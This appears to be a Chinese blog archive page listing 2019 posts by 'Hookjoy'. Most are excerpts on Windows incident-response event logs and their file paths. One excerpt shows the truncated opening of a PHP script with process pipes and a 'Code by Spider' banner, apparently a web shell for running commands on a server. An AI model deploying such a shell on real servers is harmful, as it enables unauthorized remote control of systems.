07 2019 档案

摘要:Windows应急日志常用的几个事件ID点击站内没有搜索到,可能搜索姿势不对,发一下吧,应急时可能会用到,根据日志时间点判断入侵日志路径:C:\Windows\System32\winevt\Logs查看日志:Security.evtx、System.evtx、Application.evtx如何查 阅读全文
posted @ 2019-07-18 15:30 Hookjoy 阅读(23973) 评论(0) 推荐(0) 编辑
摘要:array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; if($os == 'WIN') { $env = array('path' => 'c:... 阅读全文
posted @ 2019-07-16 12:02 Hookjoy 阅读(496) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。
posted @ 2019-07-09 13:08 Hookjoy 阅读(10) 评论(0) 推荐(0) 编辑
摘要:windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.E 阅读全文
posted @ 2019-07-01 22:32 Hookjoy 阅读(2577) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示